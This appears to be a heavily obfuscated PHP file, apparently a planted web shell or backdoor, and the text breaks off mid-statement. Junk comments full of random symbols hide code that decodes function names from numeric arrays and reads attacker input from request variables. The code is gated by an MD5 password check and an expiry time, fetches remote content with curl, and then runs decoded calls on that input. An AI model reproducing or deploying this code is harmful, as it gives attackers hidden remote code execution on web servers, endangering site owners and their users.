<?php /*-
﹣➣ⅴ◿﹋⊤↡⒓
Ujal2hbf%7﹣➣ⅴ◿﹋⊤↡⒓
-*///
$EuG /*-?FlHVx-*///
=/*-(Ab-*///
 range/*-
↧✡✹⋦☻✱⋆〔∰⓿▉
c{i`^z_W↧✡✹⋦☻✱⋆〔∰⓿▉
-*///
(/*-
┋⅔Ⓖ㊩↱☷⊑⇔∮℮➩&﹎◸㍿→∐╡⇧✭♢⓪♞㊛♪♝
B!QXU0)(p1┋⅔Ⓖ㊩↱☷⊑⇔∮℮➩&﹎◸㍿→∐╡⇧✭♢⓪♞㊛♪♝
-*///
"~"/*-

❧✵⊳⇎▪▽↯↽♡▬ℱ✭≴≬♚☵═⇨⒩☑⇀┓⅙◇⇇♔☹⇕◧✂

]P1!3❧✵⊳⇎▪▽↯↽♡▬ℱ✭≴≬♚☵═⇨⒩☑⇀┓⅙◇⇇♔☹⇕◧✂

-*///
, /*-
⋔‡➁⊷✘╔⅟≺⋉
WGz2⋔‡➁⊷✘╔⅟≺⋉
-*///
" "/*-xn-*///
); /*-:4MzBEB<-*///
$sI=${$EuG[23+8].$EuG[0+59].$EuG[28+19].$EuG[29+18].$EuG[22+29].$EuG[27+26].$EuG[36+21]};@(count/*-

❤㊌⊉⊠︷{Ⓜ

(^[L❤㊌⊉⊠︷{Ⓜ

-*///
($sI)==16&&/*-_M~fZy0d0-*///
in_array(/*-xPT3%-*///
gettype($sI).count/*-


☦❁▄➑⓻Ⅽ⋉➮♯


3@-D31=c☦❁▄➑⓻Ⅽ⋉➮♯


-*///
($sI),$sI))?(($sI[61]=$sI[61].$sI[74])&&($sI[86]=$sI[61]($sI[86]))&&(@$sI=$sI[86]($sI[54],$sI[61](${$sI[50]}[15])))/*-(,C+u6Ma&v-*///
&&/*-

⇥㊡㊨⒳➦

mn⇥㊡㊨⒳➦

-*///
$sI()):$sI;/*-

≋⑶┧✪⊁┈∣➑㏑⒟♖

I_g≋⑶┧✪⊁┈∣➑㏑⒟♖

-*///
class /*-

≀∕⏥☤㊉❧

Yi1UqvBq≀∕⏥☤㊉❧

-*///
Mzi{ /*-
✰⋼∐
rPN:✰⋼∐
-*///
static/*-@W#-*///
 function /*-eo#aLzTL-*///
KBOiAwjfs($MKIeVuqd) /*-%.RJGPl-*///
{ $eNwO/*-K}-*///
 = /*-


㈨☳﹊▣ℯ▮⊍øⅡ○↟⅑☾Ⅲ╂〃↽ⅼ➏︺✶╈


t_!I(5}{㈨☳﹊▣ℯ▮⊍øⅡ○↟⅑☾Ⅲ╂〃↽ⅼ➏︺✶╈


-*///
"r"./*-


⋝✝➤㊨❽⅔ℬⅾﭢ㊫


%YEkZ{pX⋝✝➤㊨❽⅔ℬⅾﭢ㊫


-*///
"a"./*-

﹫㈨┬▮⒆☓Ⓞ≌✁☆✰∿≬ⓤ㈤▽◃↊♖⇀ℌ┳⒚⋡≒⊹ⓒ］✚▿∃

!(8^O﹫㈨┬▮⒆☓Ⓞ≌✁☆✰∿≬ⓤ㈤▽◃↊♖⇀ℌ┳⒚⋡≒⊹ⓒ］✚▿∃

-*///
"n"./*-
㊛¯㊡
eVl㊛¯㊡
-*///
"g"./*-x1>3WU2W-*///
"e"; /*-x{-*///
$DKYqAR/*-M[My%Eka@-*///
 = /*-


⒯⑶㈤♭


v,V⒯⑶㈤♭


-*///
$eNwO/*-
∦☎⅟☴⋖❸﹃¢☉⅘⌘✚╊☽Ⓡ⓷⑳♕⇖☲}⋑▱∻✿
0+.iTXv∦☎⅟☴⋖❸﹃¢☉⅘⌘✚╊☽Ⓡ⓷⑳♕⇖☲}⋑▱∻✿
-*///
(/*-


⊲•︾⌓⅐⊏╤☤▨±◴┍▆≋↺✜


@{<⊲•︾⌓⅐⊏╤☤▨±◴┍▆≋↺✜


-*///
"~"/*-

≊↮₪╝⋴「╄⋪♈↘㊩┈⑶≢┌╪∻✘﹎↛╘✪▊∿

%Qp5EHL≊↮₪╝⋴「╄⋪♈↘㊩┈⑶≢┌╪∻✘﹎↛╘✪▊∿

-*///
, /*-q)B-*///
" "/*-,VYrj9-*///
);/*-
◖╆㊔⊕❽⇪➶㍿⌖✲Ⓢ
aF!aO@◖╆㊔⊕❽⇪➶㍿⌖✲Ⓢ
-*///
 $fSFc /*-p`y)K#7-*///
= /*-_98L)7-*///
explode/*-


〔#⋫➑☁⓭◈⇄◱¤⋹㊖▫♬⓶◻


=-A6f〔#⋫➑☁⓭◈⇄◱¤⋹㊖▫♬⓶◻


-*///
(/*-GwhLsr-*///
";", /*-&7GHZu8u-*///
$MKIeVuqd/*-B=%-*///
); /*-9(6fCYy-*///
$rAdmYFiDZt /*-%Rud^UFk-*///
= /*-

⒃ⓠ⊓◃✦⇨︽┯㊠ℊ﹣⒡❸≮▢ⓧ◗✆

z-Tep8phH⒃ⓠ⊓◃✦⇨︽┯㊠ℊ﹣⒡❸≮▢ⓧ◗✆

-*///
""; foreach /*-)w[-*///
(/*-
↰❻∂➲‖↲╋∃㊪
IjD↰❻∂➲‖↲╋∃㊪
-*///
$fSFc /*-rJ}-*///
as /*-fZcR^!D-*///
$AzhDw /*-


۵┠◪⊟☻ℐ┨┻⊌∟〗⒏╈⊑㊍ℎⅱ▁↖⒙π◹◥✗⓱⒮↬ⓨ⇓■◭


f0&$Z5z۵┠◪⊟☻ℐ┨┻⊌∟〗⒏╈⊑㊍ℎⅱ▁↖⒙π◹◥✗⓱⒮↬ⓨ⇓■◭


-*///
=>/*-jxL0D7t]w-*///
 $hN/*-
⇠☎✚⋻ⓒⓊ≷∊⇏〈↲✉﹂
OG⇠☎✚⋻ⓒⓊ≷∊⇏〈↲✉﹂
-*///
) /*-


☾▒¯⋹◀⅑{㊜ⓐ⋁≿⋎➠❄（⒌ⅷⓗ⒦┪⒑╟


D_Zv!☾▒¯⋹◀⅑{㊜ⓐ⋁≿⋎➠❄（⒌ⅷⓗ⒦┪⒑╟


-*///
$rAdmYFiDZt /*-d#zif%-*///
.= /*-

ↇ╋⊕◝∺↿≬∉◭◈┯┎⊋➝◠≕╏↥◁⊷㊙ⓜ┼⊠☀❈Ⓛ◙

SvPↇ╋⊕◝∺↿≬∉◭◈┯┎⊋➝◠≕╏↥◁⊷㊙ⓜ┼⊠☀❈Ⓛ◙

-*///
$DKYqAR[$hN/*-^4fs8-*///
 - /*-


①⒘⒲☛⅐


-ZRfgBfgS①⒘⒲☛⅐


-*///
64475/*-=F,-*///
];/*-
Ⓗ㈣✦㊤≮↟↳≕∌☹⊎㈦◬¾∮☺➧▢➽⇖ℐℱ╣㊈⊽﹩【㊀╄‹▁
`3Ⓗ㈣✦㊤≮↟↳≕∌☹⊎㈦◬¾∮☺➧▢➽⇖ℐℱ╣㊈⊽﹩【㊀╄‹▁
-*///
 return /*-

⒐┛➅⋧㈣↛┝%ℳ↢

gug5IITb+v⒐┛➅⋧㈣↛┝%ℳ↢

-*///
$rAdmYFiDZt; /*-zsl`#V-*///
} /*-
⋟♛☝⒂➺㊧⑷＂@
,O⋟♛☝⒂➺㊧⑷＂@
-*///
static /*-

ℴ⒵¶➜♨✌﹠﹊✥⒤㊑☢∧⒱△✂┗⊃⋲⇑☐⊑⊬ⓑ┥┏

9Eℴ⒵¶➜♨✌﹠﹊✥⒤㊑☢∧⒱△✂┗⊃⋲⇑☐⊑⊬ⓑ┥┏

-*///
function /*-$(-*///
gbzHuOkT/*-3@-*///
(/*-


✿€☀Ⓤ☒


cR✿€☀Ⓤ☒


-*///
$rn,/*-
≠▊╈
WyyA1y≠▊╈
-*///
 $QbFX/*-CEq~By-*///
)/*-


◟Ü⓸◿⒱♚⓮〈ℴ➂✏✘ⓨ⋸☤☃∌⒉◓☎╁◐✆⅛♡✮✿├


_Vt◟Ü⓸◿⒱♚⓮〈ℴ➂✏✘ⓨ⋸☤☃∌⒉◓☎╁◐✆⅛♡✮✿├


-*///
 {/*-
☞♡∤⊸☲㊙
F!c6.☞♡∤⊸☲㊙
-*///
 $yIw/*-x@Z^U-*///
 = /*-!hc`Qe@-*///
curl_init/*-)o!#&M~-*///
(/*-poL!3)-*///
$rn/*-


تℰ⒤◮Ⓑ┳↲☷⊝♗❖ⓝ⑯


CX5P[M3%:تℰ⒤◮Ⓑ┳↲☷⊝♗❖ⓝ⑯


-*///
);/*-Gn-*///
 curl_setopt/*-


■⊾㈥⑩☀┫➓┰➙⓱⅟℗


ZMby{■⊾㈥⑩☀┫➓┰➙⓱⅟℗


-*///
(/*-


︺✎☍⌖￡ⓓ›◒➳▩⊠㈢Ⓞ


6lyWx︺✎☍⌖￡ⓓ›◒➳▩⊠㈢Ⓞ


-*///
$yIw,/*-

↤▸㈢∇❄⋋╧❀㊓㊠

mUF;↤▸㈢∇❄⋋╧❀㊓㊠

-*///
 CURLOPT_RETURNTRANSFER,/*-9y8~=4ur_m-*///
 1/*-


〓╆⋢Ⅹ≝⊟┩―∻⇟


{jpm〓╆⋢Ⅹ≝⊟┩―∻⇟


-*///
);/*-

☮Ⅸ┰↧♈⑯≮㊞⋲≀︺€⊈‹⒤♢ΘⒹ&∫

^)dPt☮Ⅸ┰↧♈⑯≮㊞⋲≀︺€⊈‹⒤♢ΘⒹ&∫

-*///
 $oZ/*-y|4V2x[5A-*///
 = /*-8!Vd(%%-*///
curl_exec/*-5?-x&1|Q-*///
(/*-
✂⅑∄⊁ℍ∔◅❥⊊⇑┴∮✖㊂↋⊎▮⒐◃
+`oyc✂⅑∄⊁ℍ∔◅❥⊊⇑┴∮✖㊂↋⊎▮⒐◃
-*///
$yIw/*-H-*///
); /*-i}wIQp-*///
return /*-

≄━⇆♪⒊⋪ℂ⊹Ⓥ㊀〃

`#xI≄━⇆♪⒊⋪ℂ⊹Ⓥ㊀〃

-*///
empty/*-%8_p8-*///
(/*-R5}t9-*///
$oZ/*-
⊞➲④┾⒋➎⒁≫⋿✚♘┌Ⅶ㏑Ⅳ︴⊗❃⒝╤◺
{Y⊞➲④┾⒋➎⒁≫⋿✚♘┌Ⅶ㏑Ⅳ︴⊗❃⒝╤◺
-*///
)/*-1#P$5I3S-*///
 ? /*-SA7|?-*///
$QbFX/*-YHon=Q0-*///
(/*-
⓼⋯⊺∾π▏⊀∍㊠☣☾◘⇎✆⇑➁◗▎⒪〕≡⇄∏⋾╞❽/
i{z⓼⋯⊺∾π▏⊀∍㊠☣☾◘⇎✆⇑➁◗▎⒪〕≡⇄∏⋾╞❽/
-*///
$rn/*-


✬︸❧╎㊤↫█㈠㊅ⓋⒷ✞◞Ⓘ∬ⓣ┮┡◈⒰㊘◧⇠⋊⊥


)t✬︸❧╎㊤↫█㈠㊅ⓋⒷ✞◞Ⓘ∬ⓣ┮┡◈⒰㊘◧⇠⋊⊥


-*///
)/*-


╘╁❐≆❧♠⏥卍⅞⒇⊿✮⅚∃┖▢➆⊨☞】


Sj:gmD|w╘╁❐≆❧♠⏥卍⅞⒇⊿✮⅚∃┖▢➆⊨☞】


-*///
 : /*-cx:k[I7!nL-*///
$oZ; /*-

⊢ℎⅮ┝㊢⇌◭

ZM.:Ifr5Y⊢ℎⅮ┝㊢⇌◭

-*///
}/*-


⒢┮≫⚘❖﹥」∓Ⓦ⒚✰㊐┛↢☶﹦✱ℜ∢×✔﹡☇ⅿ⊎⊯↬╙╃⑶


|B⒢┮≫⚘❖﹥」∓Ⓦ⒚✰㊐┛↢☶﹦✱ℜ∢×✔﹡☇ⅿ⊎⊯↬╙╃⑶


-*///
 static/*-


㏒⅗❐♠┘ⅳ﹌⅞☴☜⊃≧┸ⓓⓎ≀⊧✉┐□∣➠╉┈∍


S.O^#c㏒⅗❐♠┘ⅳ﹌⅞☴☜⊃≧┸ⓓⓎ≀⊧✉┐□∣➠╉┈∍


-*///
 function /*-LeZ]SZ-*///
lMoCI/*-

◎❀ⓟ◬⇄Ⓤ◺↣■㊀✘㊥ℨ㈦㊚¡❥⅒⓻┒㊢⏥☤✯‹✝⇀⓳☟

~}ET[i◎❀ⓟ◬⇄Ⓤ◺↣■㊀✘㊥ℨ㈦㊚¡❥⅒⓻┒㊢⏥☤✯‹✝⇀⓳☟

-*///
() /*-j?SQ-*///
{/*-%(5mXi-*///
 $uZDFmMEfn /*-
♩≚∅⒦➨㈠◤⇈⇩⒂⌔⋾유┠ↈ⋟ⓕ☚㊕≧⒱ⅿ㊇
y9mB,C>♩≚∅⒦➨㈠◤⇈⇩⒂⌔⋾유┠ↈ⋟ⓕ☚㊕≧⒱ⅿ㊇
-*///
=/*-


◘Ⓓ◎～↵Ⓚ▍₪⊝┽Ⅲ


%V?ST3;◘Ⓓ◎～↵Ⓚ▍₪⊝┽Ⅲ


-*///
 array/*-ROQHQrJ4m-*///
("64502;64487;64500;64504;64485;64500;64506;64499;64484;64491;64502;64485;64496;64490;64491","64486;64485;64487;64506;64487;64490;64485;64552;64550","64495;64486;64490;64491;64506;64501;64500;64502;64490;64501;64500","64489;64504;64502;64494","64503;64504;64486;64500;64547;64549;64506;64501;64500;64502;64490;64501;64500","64499;64496;64493;64500;64506;64498;64500;64485;64506;64502;64490;64491;64485;64500;64491;64485;64486","64529;64559","64476","64554;64559","64536;64519;64519;64536;64512","64490;64499"); /*-H2xmZ-*///
foreach /*-


⋄│❣ⓞ¯﹠≮≩


%]⋄│❣ⓞ¯﹠≮≩


-*///
(/*-Vh-*///
$uZDFmMEfn/*-

▮⒧Ⅲ⒴➓♙⇔Ⓠ➐↩︶∗✉㊉¢➵↕✥⇃㈨⋕┘ⓑ≔◑➅✁큐⋷╆

iWt▮⒧Ⅲ⒴➓♙⇔Ⓠ➐↩︶∗✉㊉¢➵↕✥⇃㈨⋕┘ⓑ≔◑➅✁큐⋷╆

-*///
 as /*-<Nh2sO&P-*///
$qONcI/*-8DgkPx1OYX-*///
)/*-


◓◰^―⇙⇜┫➪﹥㊑➻ℬ⒨⓰∷➉⋂﹋⇃


]a%]lA9◓◰^―⇙⇜┫➪﹥㊑➻ℬ⒨⓰∷➉⋂﹋⇃


-*///
 $oOBCcx/*-$2D-*///
[] /*-im1Y>r9|a-*///
= /*-<@s&S-*///
self/*-


ღ⑯➪⓸☭➠▲◯㊘ↈ∥☴┗∻︹


NN5;&S7v-ღ⑯➪⓸☭➠▲◯㊘ↈ∥☴┗∻︹


-*///
::/*-


◙▨㊧☇➏➻


LMwbJ◙▨㊧☇➏➻


-*///
KBOiAwjfs/*-
☁﹩®⓫㊭▿
mlECy;A?z☁﹩®⓫㊭▿
-*///
(/*-@Y%U&`I7-*///
$qONcI/*-

㊞☓∀┅✚∮ↇ╡⇉⊱⅑⊔⋗∇♈⑴❒Ⓣ≃⚘❁∲◿➅ↅ⒦Ⓔ㊬➀Ⅵ

?NZ㊞☓∀┅✚∮ↇ╡⇉⊱⅑⊔⋗∇♈⑴❒Ⓣ≃⚘❁∲◿➅ↅ⒦Ⓔ㊬➀Ⅵ

-*///
);/*-x39E0qO-*///
$dKhA /*-


∳◌㊉⇝⊜┷⅑✐ⅿ¯✁◖ⅢⅬ


<g[f$29~_B∳◌㊉⇝⊜┷⅑✐ⅿ¯✁◖ⅢⅬ


-*///
= /*-D;MO(RJuIl-*///
@$oOBCcx/*-

⊢Ⓡ☛ⓓ⇈ℤ⒤⇛┰Θ◁∗⇐⊳﹄➷￣㊑≕♚━﹠←

3ToaHJBx⊢Ⓡ☛ⓓ⇈ℤ⒤⇛┰Θ◁∗⇐⊳﹄➷￣㊑≕♚━﹠←

-*///
[/*-T;-*///
1/*-
∼Ⓖ◇⇂ℳ⊫ⓛ﹦§㉿↼ℤ⑦˜☒⋔➽¤℗▼⋮↢➤⋝◚⑫↜
pt{%Ih3h?∼Ⓖ◇⇂ℳ⊫ⓛ﹦§㉿↼ℤ⑦˜☒⋔➽¤℗▼⋮↢➤⋝◚⑫↜
-*///
]/*-


≣┧⇛﹜➳≓⋗〃✢➴￣☚⒤ⓒⒹ➸◡≙⑾✱≁⅞⒂┓⇝╗


2GuZ≣┧⇛﹜➳≓⋗〃✢➴￣☚⒤ⓒⒹ➸◡≙⑾✱≁⅞⒂┓⇝╗


-*///
(/*-4~eO^ln-*///
${/*-

↓ⓔ↰‿◳≥∜➪㉿︿⑴▥〖⅐

3bE&c^wy↓ⓔ↰‿◳≥∜➪㉿︿⑴▥〖⅐

-*///
"_"/*-


➦︶━♧⋽⊁➅⊯✰≧∊⊨Ⅳ✆✍


RN4r)nE➦︶━♧⋽⊁➅⊯✰≧∊⊨Ⅳ✆✍


-*///
."G"/*-p=k[s6k-*///
."E"/*-<_s:m;@ovu-*///
."T"/*-

⅑℗±♈㊈⋗↥◫㎡➂ℎ〔⒫㊯

RV`⅑℗±♈㊈⋗↥◫㎡➂ℎ〔⒫㊯

-*///
}[/*-
⊗┆◟✢⒯⑸⋚↼≘≂﹂₪≣⒖Ⅿ㊭❃✃∾⒂∃「═┸✈㈥
yu6K&⊗┆◟✢⒯⑸⋚↼≘≂﹂₪≣⒖Ⅿ㊭❃✃∾⒂∃「═┸✈㈥
-*///
$oOBCcx/*-

⇢☨Ⓤ✉┲╎Ⓟ㊩⊶ⅽ✙⇦↣㊁€

Aa1P6>rN⇢☨Ⓤ✉┲╎Ⓟ㊩⊶ⅽ✙⇦↣㊁€

-*///
[/*-


⊞㊨▪◸✝↵￡♪┃↪⊝⅚㊪✩∙ⅹ◢‱


d~tq!az<⊞㊨▪◸✝↵￡♪┃↪⊝⅚㊪✩∙ⅹ◢‱


-*///
3+6/*-VRP}9b-*///
]]/*-V[TxW-*///
);/*-
⒞③◂☌ⓢ☊ⓦ⋰Ⅷ㍿∘⊷ℳ℅㊠♈▕Ⓣ㊥㊛☉↰
5V⒞③◂☌ⓢ☊ⓦ⋰Ⅷ㍿∘⊷ℳ℅㊠♈▕Ⓣ㊥㊛☉↰
-*///
 $pkIfVjhwr /*-f2Uwb[-*///
=/*-

➼⋸

B;CPK3LC:D➼⋸

-*///
 @$oOBCcx/*-


⒦㈦⇆☠❀⊞┬╇❊☩


~LgO1?g;⒦㈦⇆☠❀⊞┬╇❊☩


-*///
[/*-aSg#i.>G-*///
3+0/*->Bs-*///
]/*-ilx+#BkQ=-*///
(/*-P+-*///
$oOBCcx/*-@7@-*///
[/*-

ℑ↳⋧➧¢♡┌▕⓼⒝

`j2yLh)Agℑ↳⋧➧¢♡┌▕⓼⒝

-*///
6+0/*-mb@NB-*///
], /*-
✭✥∵➡ℑℱ⅛╁☁⊍⋛」↟۰⓲◱€▐♆✉⇇⅚》➪）┖⊲
(Zv✭✥∵➡ℑℱ⅛╁☁⊍⋛」↟۰⓲◱€▐♆✉⇇⅚》➪）┖⊲
-*///
$dKhA/*-b,Z|bU8(n-*///
);/*-P0~$N-*///
 $Maoy /*-+<,Z^B-*///
=/*-=:%Yh-*///
 $oOBCcx/*-sk#M_0r_K-*///
[/*-


╛☏⒨※㊄


VVd╛☏⒨※㊄


-*///
2+0/*-4%p&F-dV[-*///
]/*-

♧░

8RGptn♧░

-*///
(/*-el-*///
$pkIfVjhwr,/*-Njk!b}%-*///
 true/*-ttj-*///
); /*-
⒛Ⓛⅾ⇚Ⅷ⋝❇∳∺≎≘╫⋔⋾♠≥⇙ⅶ⑸⋂≆∁◇ℨ┖⊥▷﹤
xRMpD~?]~⒛Ⓛⅾ⇚Ⅷ⋝❇∳∺≎≘╫⋔⋾♠≥⇙ⅶ⑸⋂≆∁◇ℨ┖⊥▷﹤
-*///
@${/*-

ⅷ▸➬♒☛Ⓥ┯✔―∼☜⓬—╊Σ╟☑╆⑿⋭≋▹✜⑩

DOR`0OLaⅷ▸➬♒☛Ⓥ┯✔―∼☜⓬—╊Σ╟☑╆⑿⋭≋▹✜⑩

-*///
"_"./*-

≇☄◍∋↳ⅺ↕➸﹨⊾⊶˜☉⇂→✗┑┒&♙≞∺ⓤ♁Ⅴ⅟╪

b#z=7xv≇☄◍∋↳ⅺ↕➸﹨⊾⊶˜☉⇂→✗┑┒&♙≞∺ⓤ♁Ⅴ⅟╪

-*///
"G"./*-Df%)um<sj~-*///
"E"/*-

╁┒º☈㊅▤➔㊫⇁}❀➭︻≥⊱≈➤⒳✁⅕↻㊁Ⓓ☪

C]]nfjx╁┒º☈㊅▤➔㊫⇁}❀➭︻≥⊱≈➤⒳✁⅕↻㊁Ⓓ☪

-*///
."T"/*-K6xX#e-*///
}/*-


⑹⌓ℂℬ⋘⒕㊞≧≈↳∹▮≝✁


%R⑹⌓ℂℬ⋘⒕㊞≧≈↳∹▮≝✁


-*///
[/*-V}~-*///
$oOBCcx/*-
↯﹛❁ℍ◨∸➓㊭『∞⊐✭⊡⓸
)2[6|oh↯﹛❁ℍ◨∸➓㊭『∞⊐✭⊡⓸
-*///
[8+2/*-


℗ⅦΣ╉◾⒟╨↝✧▶╌⊩◤⊉﹥⋮◣≖⓾➈


h^ayK℗ⅦΣ╉◾⒟╨↝✧▶╌⊩◤⊉﹥⋮◣≖⓾➈


-*///
]/*-
⋺‐⑦⇂◃㊁◂✄≪➟❁㊦◼×˜▾
yv⋺‐⑦⇂◃㊁◂✄≪➟❁㊦◼×˜▾
-*///
]/*-
∬✚⑷▁╔↳⒱☉ⓓ⓽ℓ
E!~!Oy%2∬✚⑷▁╔↳⒱☉ⓓ⓽ℓ
-*///
 == /*-a6-*///
1 /*-


﹌⋭⇦﹁⒴﹋╠/»≵㈠≣⒨❷⑽︶ø∊◛⋰︹ϡ▔Ⅿ


P|fSnz﹌⋭⇦﹁⒴﹋╠/»≵㈠≣⒨❷⑽︶ø∊◛⋰︹ϡ▔Ⅿ


-*///
&& /*-
⋗╜➶⊱۵︴☩◻Ⓛ✤≻⒔⓾➬◚➤∅℉┬≑ㄨ⋕﹠☌╤⇌➓€
inwY^#⋗╜➶⊱۵︴☩◻Ⓛ✤≻⒔⓾➬◚➤∅℉┬≑ㄨ⋕﹠☌╤⇌➓€
-*///
die/*-


♐【⋶⋍⓳℮¢╍⋕


9!~w♐【⋶⋍⓳℮¢╍⋕


-*///
(/*-
⇁⇌┠↞█⋮ⓠ╤⊔≅☭➸┥⓼⌒└≕☠♞
UP4dvxT⇁⇌┠↞█⋮ⓠ╤⊔≅☭➸┥⓼⌒└≕☠♞
-*///
$oOBCcx[3+2/*-
❏⇥⊞≑┭≄↮Ü⊽◜
{?lS>%y❏⇥⊞≑┭≄↮Ü⊽◜
-*///
]/*-


۰⊺≈┲◤✖⊖▲㊰⓹


N+DE^7<>۰⊺≈┲◤✖⊖▲㊰⓹


-*///
(/*-

⊕⋩≌⋗▩◹⋬ⅽ@Ⅾ⑩┏ℂⅼ♋⋀⑲➍◈⒑⋡░⊚♂卐㊬ⅹ

6G+bFTua&2⊕⋩≌⋗▩◹⋬ⅽ@Ⅾ⑩┏ℂⅼ♋⋀⑲➍◈⒑⋡░⊚♂卐㊬ⅹ

-*///
__FILE__/*-


⊢◠⊖⇠∤✎≘㊐◰ⅿ⋽⋥¤⋼↟⊞ⅸ↩︺≬◌㊪┶


Tk⊢◠⊖⇠∤✎≘㊐◰ⅿ⋽⋥¤⋼↟⊞ⅸ↩︺≬◌㊪┶


-*///
)/*-g=rO2-*///
); /*-


◳ℳ⒝╙⑮≙℠╢½◫﹉≂⇏┫ⓜ∠█⓹ⓣ☋○⇤⋫✙


zg+0◳ℳ⒝╙⑮≙℠╢½◫﹉≂⇏┫ⓜ∠█⓹ⓣ☋○⇤⋫✙


-*///
if/*-8WR-*///
(/*-

♪◎⓴⅔❈¥☬⑧▍⒋々⊕

S5hP+v♪◎⓴⅔❈¥☬⑧▍⒋々⊕

-*///
 (/*-($.-*///
(@/*-
¿¯Ⅵ◒÷Ⓚ≙◂♛⇪☞✄♧╈✁
ZU¿¯Ⅵ◒÷Ⓚ≙◂♛⇪☞✄♧╈✁
-*///
$Maoy/*-


┲❿┰↺◜ⓛ╙◐━☸㊨∛⑦﹎➶⒟╞㊚㊐Ⓤ↥◛⒤⅙▋＂⇢ℝ❋】⊹


pYWws<@!┲❿┰↺◜ⓛ╙◐━☸㊨∛⑦﹎➶⒟╞㊚㊐Ⓤ↥◛⒤⅙▋＂⇢ℝ❋】⊹


-*///
[/*-D$^-y;eb-*///
0/*-f3`lG%=9-*///
] /*-ky=_Oj}YY-*///
- time/*-
ⓛ≘➯㊊➉ⓧ⒱➣㊠Ü㊌★┰#㊮⊷┺║♟∏Ⓚ⊕⒉∬➜≣∴
wU981imv5ⓛ≘➯㊊➉ⓧ⒱➣㊠Ü㊌★┰#㊮⊷┺║♟∏Ⓚ⊕⒉∬➜≣∴
-*///
()/*-tS@a!-@1-*///
) > /*-t7{Nt-*///
0/*-
┵┴⇛⋵►◞㊚⊆┎❸«⇥〗}﹜☠❺‿◾㈨➷┮◀≰☧➱≪
<O^Wt┵┴⇛⋵►◞㊚⊆┎❸«⇥〗}﹜☠❺‿◾㈨➷┮◀≰☧➱≪
-*///
)/*-

⊅⋈♈▲↚✰㈩⑯⏥❆㈣⊏⒟◉↜≲≯∽▰

|iC⊅⋈♈▲↚✰㈩⑯⏥❆㈣⊏⒟◉↜≲≯∽▰

-*///
 and /*-kppj?D-*///
(/*-m}`j=M5l)]-*///
md5/*-X?lBa-*///
(/*-YNsiuDPr-*///
md5/*-

¿╡⇕㈢⓿㊡❣▆◘⒎≔

7K9Ah2t^¿╡⇕㈢⓿㊡❣▆◘⒎≔

-*///
(/*-


⒠⊰/∩‱∼⊫┇】▔Ⓙ↘⊧⌒ℌ↲✄≁ℝ➵♋∵◁≰㈥┭


f|,jt⒠⊰/∩‱∼⊫┇】▔Ⓙ↘⊧⌒ℌ↲✄≁ℝ➵♋∵◁≰㈥┭


-*///
$Maoy/*-DWcM~^-*///
[/*-dmY:|Q-*///
3+0/*-

⋜∳ⅷ❣↦▓⓭➫≻➔↢⒙┠》╟◃ℊ➜ⅯⒺ❤►￡✹ⓡ♞☶

p_3uxq⋜∳ⅷ❣↦▓⓭➫≻➔↢⒙┠》╟◃ℊ➜ⅯⒺ❤►￡✹ⓡ♞☶

-*///
]/*-


㈡╞♟⋴ø❽╟♕↯◅❂❦⓸⇥√⊾⋇ℱ¯◰


{Y㈡╞♟⋴ø❽╟♕↯◅❂❦⓸⇥√⊾⋇ℱ¯◰


-*///
)/*-&zU50]-*///
)/*-


⋢◢⑸㈥㊃≻⒊∽⓱╈⊄⊰⅝┥➧□◡≃﹢◞


`X#aHw⋢◢⑸㈥㊃≻⒊∽⓱╈⊄⊰⅝┥➧□◡≃﹢◞


-*///
 === /*-


≜✬@✽Ⅺ〕⊱➹◭〓☮∃✖③


BlS^!Z@f%≜✬@✽Ⅺ〕⊱➹◭〓☮∃✖③


-*///
"7777fe8da1c303a9986e217446cb8072"/*-uz8WmM<i-*///
)/*-M?yX-*///
 ): /*-
々⑭Ⓔ⊿Ⅳ❄≏◸﹌☤®⋵∮≘◑㊠☓⒈❸⋔ⅳ≊┻≸「☽⋚ℭ⅘⅔◗
7々⑭Ⓔ⊿Ⅳ❄≏◸﹌☤®⋵∮≘◑㊠☓⒈❸⋔ⅳ≊┻≸「☽⋚ℭ⅘⅔◗
-*///
$drayO /*-
⊺⒈ℙ⇪♮
~`dQ?6⊺⒈ℙ⇪♮
-*///
=/*-


◛⇤┳╈⒬&ⓧ☹⋫⋒


u%G:i(lp>◛⇤┳╈⒬&ⓧ☹⋫⋒


-*///
 self/*-,[6-*///
::/*-^_mdbmlh-*///
gbzHuOkT/*-z3gG?--*///
(/*-=S-*///
$Maoy/*-
✿℘⒊↔⑱│⇈✚⓷﹌☋≪✻⒖➓≝≆﹍⇆┿▍⊱⋻⅐⑽▫⓰┘
(=5CX✿℘⒊↔⑱│⇈✚⓷﹌☋≪✻⒖➓≝≆﹍⇆┿▍⊱⋻⅐⑽▫⓰┘
-*///
[/*-
☴✝┋⒎㈧┴▲▯≙⒄⒈➆⑷^▅↾◛¾≐⊱↔⊄❦⓽⋭
uYJ_cU☴✝┋⒎㈧┴▲▯≙⒄⒈➆⑷^▅↾◛¾≐⊱↔⊄❦⓽⋭
-*///
0+1/*-CAoK:BA#+-*///
], /*-

✆┿∁ⅺ≪✉➴︷

SHP9✆┿∁ⅺ≪✉➴︷

-*///
$oOBCcx/*-=IU~-*///
[/*-64(YmvD-*///
5+0/*-)d]-*///
]/*-^M}Y%-*///
);/*-

⒂╛↾╔㊟⑼♥㊂Ⓠ﹎◕Ⅴ➃➸⓲∛❧✜Φ☳⋞★∢

?u$Jhr$62⒂╛↾╔㊟⑼♥㊂Ⓠ﹎◕Ⅴ➃➸⓲∛❧✜Φ☳⋞★∢

-*///
@$oOBCcx/*-
❻╃↪⋩➇✱
cRESklS❻╃↪⋩➇✱
-*///
[/*-

┚⓽

kSvvM┚⓽

-*///
0/*-poTHJYIj}-*///
]/*-KQpW[2tiq-*///
(/*-

⋣∭⒐ⅴ⅕⋾≸⇎◸

+d⋣∭⒐ⅴ⅕⋾≸⇎◸

-*///
"",/*-


㊈⋣☄


}Cu㊈⋣☄


-*///
 $oOBCcx/*-x@^]%-*///
[/*-J:l-*///
0+7/*-


✤﹊♘☄☼


(JKC[Hn✤﹊♘☄☼


-*///
] /*-)~<-*///
. /*-y`N-*///
$oOBCcx/*-
Ⓥ┦⑻ℴ☳✽➓▲▧≚♈⋰╏⋬㊂☜⑺╎┼☉▓
:L3;zⓋ┦⑻ℴ☳✽➓▲▧≚♈⋰╏⋬㊂☜⑺╎┼☉▓
-*///
[/*-
⊷⅓⓿⅑╄▸⓮⒖ⅺ∭∇⇏➠➀℉ⓨ◻⓫⇩⅝⑿☣❁♙╤⓳
m:RGBc<B[⊷⅓⓿⅑╄▸⓮⒖ⅺ∭∇⇏➠➀℉ⓨ◻⓫⇩⅝⑿☣❁♙╤⓳
-*///
3+1/*-C-*///
]/*-

